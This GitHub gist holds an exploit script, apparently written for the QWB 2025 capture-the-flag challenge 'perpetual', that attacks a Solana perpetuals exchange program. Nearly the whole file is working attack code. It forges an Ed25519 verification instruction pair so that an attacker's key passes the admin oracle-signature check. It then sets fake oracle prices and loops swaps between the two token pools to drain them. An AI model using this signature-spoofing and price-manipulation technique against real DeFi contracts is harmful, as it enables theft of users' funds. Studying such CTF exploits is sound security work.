Skip to content

Instantly share code, notes, and snippets.

@lbr77
Created November 24, 2025 17:30
Show Gist options
  • Select an option

  • Save lbr77/97d96fe9e8167454e9118d4dd567e43e to your computer and use it in GitHub Desktop.

Select an option

Save lbr77/97d96fe9e8167454e9118d4dd567e43e to your computer and use it in GitHub Desktop.
qwb 2025 perpetual exp
from pwn import *
import json
import struct
import sys
import time
import urllib.request
from solders.pubkey import Pubkey
from solders.keypair import Keypair
from solders.instruction import Instruction, AccountMeta
from solders.system_program import ID as SYS_PROGRAM_ID
from solders.sysvar import INSTRUCTIONS as SYSVAR_INSTRUCTIONS_ID
# import subprocess
# print = lambda *a, **k: None
# p = subprocess.Popen(["orb", "./challege_server"],stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# time.sleep(1)
context.log_level = "error"
ED25519_PROGRAM_ID = Pubkey.from_string("Ed25519SigVerify111111111111111111111111111")
SPL_TOKEN_ID = Pubkey.from_string("TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA")
SPL_ASSOCIATED_TOKEN_ID = Pubkey.from_string("ATokenGPvbdGVxr1b2hvZbsiqW5xWH25efTNsLJA8knL")
IX_SET_CUSTOM_ORACLE_PRICE = bytes([0xef, 0x2b, 0x41, 0x94, 0xe1, 0x85, 0x6d, 0x9c])
IX_SWAP = bytes([0xf8, 0xc6, 0x9e, 0x91, 0xe1, 0x75, 0x87, 0xc8])
R1_DECIMALS = 9
R2_DECIMALS = 6
class SolanaClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.r = remote(host, port)
def close(self):
self.r.close()
def reconnect(self):
self.close()
self.r = remote(self.host, self.port)
self.read_banner_key("Player:")
self.read_banner_key("Admin:")
self.read_banner_key("Mint1:")
self.read_banner_key("Mint2:")
def read_banner_key(self, prefix):
self.r.recvuntil(prefix.encode())
line = self.r.recvline().strip().decode()
return Pubkey.from_string(line.strip())
def send_transaction(self, ixs):
self.r.recvuntil(b"num instructions:")
self.r.sendline(str(len(ixs)).encode())
for ix in ixs:
self.send_instruction(ix)
def send_instruction(self, ix):
self.r.recvuntil(b"program:")
self.r.sendline(str(ix.program_id).encode())
self.r.recvuntil(b"num accounts:")
self.r.sendline(str(len(ix.accounts)).encode())
for acc in ix.accounts:
tag = "w" if acc.is_writable else "r"
if acc.is_signer:
tag += "s"
self.r.sendline(f"{tag} {acc.pubkey}".encode())
self.r.recvuntil(b"ix len:")
self.r.sendline(str(len(ix.data)).encode())
self.r.send(ix.data)
def get_associated_token_address(owner, mint):
return Pubkey.find_program_address(
[bytes(owner), bytes(SPL_TOKEN_ID), bytes(mint)],
SPL_ASSOCIATED_TOKEN_ID
)[0]
def serialize_params(custody, price, expo, conf, ema, publish_time):
return (
bytes(custody) +
struct.pack("<Q", price) +
struct.pack("<i", expo) +
struct.pack("<Q", conf) +
struct.pack("<Q", ema) +
struct.pack("<q", publish_time)
)
def forge_ed25519_pair(admin_pubkey: Pubkey, params_bytes: bytes, attacker_keypair: Keypair):
msg = params_bytes
# 转换成真正的 bytes
sig = bytes(attacker_keypair.sign_message(msg)) # Signature -> bytes
attacker_pubkey_bytes = bytes(attacker_keypair.pubkey())
admin_pubkey_bytes = bytes(admin_pubkey)
# 为真验证准备 offsets
sig_offset = 16
pk_offset = sig_offset + len(sig) # 16 + 64 = 80
msg_offset = pk_offset + len(attacker_pubkey_bytes) # 80 + 32 = 112
real_data = bytearray()
# header
real_data.append(1) # num_signatures
real_data.append(0) # padding
# 描述块(14 bytes)
real_data.extend(struct.pack("<H", sig_offset)) # signature offset
real_data.extend(struct.pack("<H", 0xFFFF)) # signature_instruction_index (self)
real_data.extend(struct.pack("<H", pk_offset)) # pubkey offset
real_data.extend(struct.pack("<H", 0xFFFF)) # pubkey_instruction_index (self)
real_data.extend(struct.pack("<H", msg_offset)) # msg offset
real_data.extend(struct.pack("<H", len(msg))) # msg length
real_data.extend(struct.pack("<H", 0xFFFF)) # message_instruction_index (self)
# 拼接真实签名 | attacker_pubkey | msg
real_data.extend(sig)
real_data.extend(attacker_pubkey_bytes)
real_data.extend(msg)
real_ix = Instruction(ED25519_PROGRAM_ID, bytes(real_data), [])
# ================
# fake_ix
# ================
fake_len = msg_offset + len(msg)
if fake_len < 112 + len(msg):
fake_len = 112 + len(msg)
fake_data = bytearray(fake_len)
fake_data[0] = 1
fake_data[1] = 0
# 指向 real_ix(索引=1)
struct.pack_into("<H", fake_data, 2, sig_offset)
struct.pack_into("<H", fake_data, 4, 1)
struct.pack_into("<H", fake_data, 6, pk_offset)
struct.pack_into("<H", fake_data, 8, 1)
struct.pack_into("<H", fake_data, 10, msg_offset)
struct.pack_into("<H", fake_data, 12, len(msg))
struct.pack_into("<H", fake_data, 14, 1)
# perpetuals 会用固定 slice 取这里的数据
fake_data[16:48] = admin_pubkey_bytes
fake_data[112:112 + len(msg)] = msg
fake_ix = Instruction(ED25519_PROGRAM_ID, bytes(fake_data), [])
return fake_ix, real_ix
# -------------------------------------------------------------------------
# Custody Limit 计算
# -------------------------------------------------------------------------
def compute_safe_amount_in(
free_out_tokens,
dec_in, dec_out,
price_in, expo_in,
price_out, expo_out,
safety
):
if free_out_tokens <= 0:
return 0
free_out_lamports = free_out_tokens * (10 ** dec_out)
P_in = price_in * (10 ** expo_in)
P_out = price_out * (10 ** expo_out)
if P_in <= 0 or P_out <= 0:
return 0
scale = 10 ** (dec_in - dec_out)
max_in = free_out_lamports * (P_out / P_in) * scale
max_in *= safety
if max_in > 2**63 - 1:
max_in = 2**63 - 1
if max_in < 1:
return 1
return int(max_in)
def main():
# host, port = "10.10.10.80", 1337
# host, port = "192.168.2.94", 1337
host, port = "127.0.0.1", 1337
client = SolanaClient(host, port)
player = client.read_banner_key("Player:")
admin = client.read_banner_key("Admin:")
mint1 = client.read_banner_key("Mint1:")
mint2 = client.read_banner_key("Mint2:")
program_id = Pubkey.from_string("Bmr31xzZYYVUdoHmAJL1DAp2anaitW8Tw9YfASS94MKJ")
perpetuals_pda = Pubkey.find_program_address([b"perpetuals"], program_id)[0]
transfer_authority_pda = Pubkey.find_program_address([b"transfer_authority"], program_id)[0]
pool_pda = Pubkey.find_program_address([b"pool", b"test pool"], program_id)[0]
custody1_pda = Pubkey.find_program_address([b"custody", bytes(pool_pda), bytes(mint1)], program_id)[0]
custody2_pda = Pubkey.find_program_address([b"custody", bytes(pool_pda), bytes(mint2)], program_id)[0]
custody1_token = Pubkey.find_program_address([b"custody_token_account", bytes(pool_pda), bytes(mint1)], program_id)[0]
custody2_token = Pubkey.find_program_address([b"custody_token_account", bytes(pool_pda), bytes(mint2)], program_id)[0]
oracle1_pda = Pubkey.find_program_address([b"oracle_account", bytes(pool_pda), bytes(mint1)], program_id)[0]
oracle2_pda = Pubkey.find_program_address([b"oracle_account", bytes(pool_pda), bytes(mint2)], program_id)[0]
player_ata1 = get_associated_token_address(player, mint1)
player_ata2 = get_associated_token_address(player, mint2)
create_ata_data = bytes([1]) # CreateIdempotent
def make_create_ata_ix(mint, ata):
return Instruction(
SPL_ASSOCIATED_TOKEN_ID,
create_ata_data,
[
AccountMeta(player, True, True), # funding (signer)
AccountMeta(ata, False, True), # ata
AccountMeta(player, False, False), # owner
AccountMeta(mint, False, False), # mint
AccountMeta(SYS_PROGRAM_ID, False, False),
AccountMeta(SPL_TOKEN_ID, False, False),
]
)
client.send_transaction([
make_create_ata_ix(mint1, player_ata1),
make_create_ata_ix(mint2, player_ata2)
])
client.reconnect()
# 生成攻击 key
attacker_keypair = Keypair()
ts_base = int(time.time())
def fresh_ts():
nonlocal ts_base
ts_base = max(ts_base + 1, int(time.time()))
return ts_base
def set_oracle(custody_pda, oracle_pda, price, expo):
params = serialize_params(custody_pda, price, expo, 1, price, fresh_ts())
fake, real = forge_ed25519_pair(admin, params, attacker_keypair)
ix = Instruction(program_id, IX_SET_CUSTOM_ORACLE_PRICE + params, [
AccountMeta(perpetuals_pda, False, False),
AccountMeta(pool_pda, False, False),
AccountMeta(custody_pda, False, False),
AccountMeta(oracle_pda, False, True),
AccountMeta(SYSVAR_INSTRUCTIONS_ID, False, False),
])
client.send_transaction([fake, real, ix])
client.reconnect()
def swap_m1_to_m2(amount):
data = IX_SWAP + struct.pack("<Q", amount) + struct.pack("<Q", 0)
ix = Instruction(program_id, data, [
AccountMeta(player, True, True),
AccountMeta(player_ata1, False, True),
AccountMeta(player_ata2, False, True),
AccountMeta(transfer_authority_pda, False, False),
AccountMeta(perpetuals_pda, False, False),
AccountMeta(pool_pda, False, True),
AccountMeta(custody1_pda, False, True),
AccountMeta(oracle1_pda, False, False),
AccountMeta(custody1_token, False, True),
AccountMeta(custody2_pda, False, True),
AccountMeta(oracle2_pda, False, False),
AccountMeta(custody2_token, False, True),
AccountMeta(SPL_TOKEN_ID, False, False),
])
client.send_transaction([ix])
client.reconnect()
def swap_m2_to_m1(amount):
data = IX_SWAP + struct.pack("<Q", amount) + struct.pack("<Q", 0)
ix = Instruction(program_id, data, [
AccountMeta(player, True, True),
AccountMeta(player_ata2, False, True),
AccountMeta(player_ata1, False, True),
AccountMeta(transfer_authority_pda, False, False),
AccountMeta(perpetuals_pda, False, False),
AccountMeta(pool_pda, False, True),
AccountMeta(custody2_pda, False, True),
AccountMeta(oracle2_pda, False, False),
AccountMeta(custody2_token, False, True),
AccountMeta(custody1_pda, False, True),
AccountMeta(oracle1_pda, False, False),
AccountMeta(custody1_token, False, True),
AccountMeta(SPL_TOKEN_ID, False, False),
])
client.send_transaction([ix])
client.reconnect()
def fetch_metrics():
url = f"http://{host}:8080/metrics"
data = json.loads(urllib.request.urlopen(url).read().decode())
return float(data["custody1"]), float(data["custody2"]), float(data["aum"])
set_oracle(custody1_pda, oracle1_pda, 1_000_000_000, -3)
set_oracle(custody2_pda, oracle2_pda, 1_000_000_000, -9)
swap_m1_to_m2(900)
c1,c2,aum = fetch_metrics()
def a2b(amount, times, p1,e1 ,p2,e2):
for _ in range(times):
p1, e1 = 1_000_000_000, -7
p2, e2 = 1_000_000_000, -5
set_oracle(custody1_pda, oracle1_pda, p1, e1)
set_oracle(custody2_pda, oracle2_pda, p2, e2)
swap_m2_to_m1(amount)
c1,c2,aum = fetch_metrics()
print(f"A-B {c1=} {c2=} {aum=}")
sleep(0.1)
def b2a(amount, times, p1,e1 ,p2,e2):
for _ in range(times):
p1, e1 = 1_000_000_000, -3
p2, e2 = 1_000_000_000, -6
set_oracle(custody1_pda, oracle1_pda, p1, e1)
set_oracle(custody2_pda, oracle2_pda, p2, e2)
swap_m1_to_m2(amount)
c1,c2,aum = fetch_metrics()
print(f"B-A {c1=} {c2=} {aum=}")
sleep(0.1)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 6, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 20, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 12, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_000, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_00_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_00, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_0_000, 20, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_00, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_0_000, 8, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_00, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_0_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
a2b(10_0, 7, 1_000_000_000, -7, 1_000_000_000, -5)
b2a(10_000, 7, 1_000_000_000, -3, 1_000_000_000, -6)
client.r.sendlineafter("num instructions:", b"0")
client.r.close()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment